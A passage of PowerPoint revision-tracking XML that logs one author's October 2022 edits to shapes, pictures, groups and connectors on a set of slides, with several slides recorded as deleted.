          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:49:17.885" v="1244" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="29" creationId="{C2EB6F10-97AC-920C-886B-9774103B8521}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:50:21.248" v="1402" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:spMk id="30" creationId="{3EC7B702-B3A3-CFD8-4961-DF0D6938ECB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:25.171" v="1097" actId="165"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:grpSpMk id="7" creationId="{A4C7B225-B732-D0BD-C998-EB97F4C85F7A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:30.054" v="1098" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:picMk id="8" creationId="{C19487CF-8B6F-9E2C-2E76-9FEBF6E94DEA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:50.893" v="1114" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:picMk id="9" creationId="{C61E203A-2298-4446-AF4E-32F60865CB08}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:54.405" v="1116" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:picMk id="19" creationId="{441A42DD-43DA-EDC7-E081-2EE981D4B523}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:47:08.940" v="1125" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:picMk id="21" creationId="{B3DFC6E5-96C5-BD39-07FC-2F27D957F549}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:47:42.156" v="1150" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:picMk id="1026" creationId="{2002734A-933A-7F5B-C7B6-7D0FFCA73255}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:47:33.483" v="1146" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:cxnSpMk id="10" creationId="{D125AF68-D19A-AD72-C292-1F4B252B2FC4}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod topLvl">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:46:35.927" v="1102" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:cxnSpMk id="13" creationId="{D1CED410-0E2B-8E88-14A3-315F1EF12331}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:47:38.581" v="1149" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3875275752" sldId="297"/>
            <ac:cxnSpMk id="26" creationId="{BCA99B30-807D-5775-A541-5378634D0320}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:32:01.172" v="427" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="80597609" sldId="298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2236454765" sldId="299"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:33:53.220" v="655" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2521007631" sldId="300"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:33:50.910" v="654" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1190581667" sldId="301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2873266326" sldId="302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847199092" sldId="303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1738595862" sldId="304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3634349355" sldId="305"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp ord modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:41:42.075" v="864"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2057539986" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:09.269" v="852" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="8" creationId="{0EFACF5D-2DE3-BCF5-7FB7-0FFCE4D5D11B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:13.066" v="853" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="10" creationId="{57DAA4A3-7E8B-E0AA-EA4E-D11396E97DF1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:23.216" v="854" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="18" creationId="{AC3552F9-F08F-2CD1-D1F8-4DCDA94E5454}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:32.446" v="855" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="20" creationId="{C56F93D8-C651-33B7-2C26-720ED0B75E72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:41:08.080" v="857" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="22" creationId="{729E72B9-9F8E-2DBD-2310-766498BEE14B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:50.954" v="856" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="27" creationId="{BC28DF3A-48BC-03AF-D3C0-F27298A395E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:23.216" v="854" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="29" creationId="{53732E87-B718-A3B9-7613-A16877FE2475}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:32.446" v="855" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="31" creationId="{8935A081-9BEA-3D35-CEC1-429BE839F270}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:50.954" v="856" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="33" creationId="{4910BDE6-D635-72CE-EAFC-B09DDA67F905}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:41:08.080" v="857" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="35" creationId="{A06253A4-6E74-7173-EA0E-B69424E6D48D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:41:08.080" v="857" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="38" creationId="{9944F12B-8F65-4E77-377A-6ACD930BCE03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:09.269" v="852" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="40" creationId="{14C08AB2-B977-6B21-6C29-86904DE7B76E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:13.066" v="853" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="42" creationId="{24722287-8985-02D1-FAF5-15B984815B22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:09.269" v="852" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:grpSpMk id="3" creationId="{BC1892E2-095E-28A3-842E-4083C3CFCB67}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:13.066" v="853" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:grpSpMk id="5" creationId="{229293E5-752F-66EB-7358-39742817C11F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:23.216" v="854" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:grpSpMk id="6" creationId="{274B7874-B50C-EC88-9F93-67FC1DD685EF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:32.446" v="855" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:grpSpMk id="7" creationId="{932DB142-611B-D8F1-80DD-71EEE762D7EB}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:50.954" v="856" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:grpSpMk id="9" creationId="{3198CB1A-14BB-BB64-FF7E-3911B965F5F3}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:41:08.080" v="857" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:grpSpMk id="11" creationId="{ED2B93E4-09A3-CB2E-07ED-7CD29207205E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:41:08.080" v="857" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:picMk id="12" creationId="{3063BEAE-B238-4284-27B7-45EC27FD5BAA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:23.216" v="854" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:picMk id="14" creationId="{E9508BFD-9880-D2AE-0196-7BFCAFD5A787}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:32.446" v="855" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:picMk id="16" creationId="{AF3CB755-2523-5DBA-2D85-5EEB462DBE3D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:40:50.954" v="856" actId="164"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:picMk id="25" creationId="{39A839C5-F671-107C-8B03-B9452D4B625B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:38:51.495" v="832" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1708406914" sldId="308"/>
        </pc:sldMkLst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1718002156" sldId="309"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:38:36.010" v="828" actId="21"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="746729536" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:38:36.010" v="828" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="746729536" sldId="310"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:22:59.283" v="4052" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3172845529" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:39:29.965" v="848" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3172845529" sldId="311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6:22:59.283" v="4052" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3172845529" sldId="311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753041370" sldId="312"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:06:46.123" v="2447" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1635383252" sldId="313"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:06:46.123" v="2447" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1635383252" sldId="313"/>
            <ac:spMk id="6" creationId="{021DB960-2713-C71C-53BF-43DC1D9718AC}"/>
          </ac:spMkLst>
        </pc:spChg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1657834469" sldId="314"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp ord modAnim">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:43:13.551" v="878"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3681539690" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:15.335" v="865" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="8" creationId="{0EFACF5D-2DE3-BCF5-7FB7-0FFCE4D5D11B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:19.240" v="866" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="10" creationId="{57DAA4A3-7E8B-E0AA-EA4E-D11396E97DF1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:24.010" v="867" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="18" creationId="{AC3552F9-F08F-2CD1-D1F8-4DCDA94E5454}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:29.435" v="868" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="20" creationId="{C56F93D8-C651-33B7-2C26-720ED0B75E72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:35.936" v="869" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="22" creationId="{729E72B9-9F8E-2DBD-2310-766498BEE14B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:41.248" v="870" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="27" creationId="{BC28DF3A-48BC-03AF-D3C0-F27298A395E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:24.010" v="867" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="29" creationId="{53732E87-B718-A3B9-7613-A16877FE2475}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:29.435" v="868" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="31" creationId="{8935A081-9BEA-3D35-CEC1-429BE839F270}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:41.248" v="870" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="33" creationId="{4910BDE6-D635-72CE-EAFC-B09DDA67F905}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:35.936" v="869" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="35" creationId="{A06253A4-6E74-7173-EA0E-B69424E6D48D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:42:15.335" v="865" actId="164"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="40" creationId="{14C08AB2-B977-6B21-6C29-86904DE7B76E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
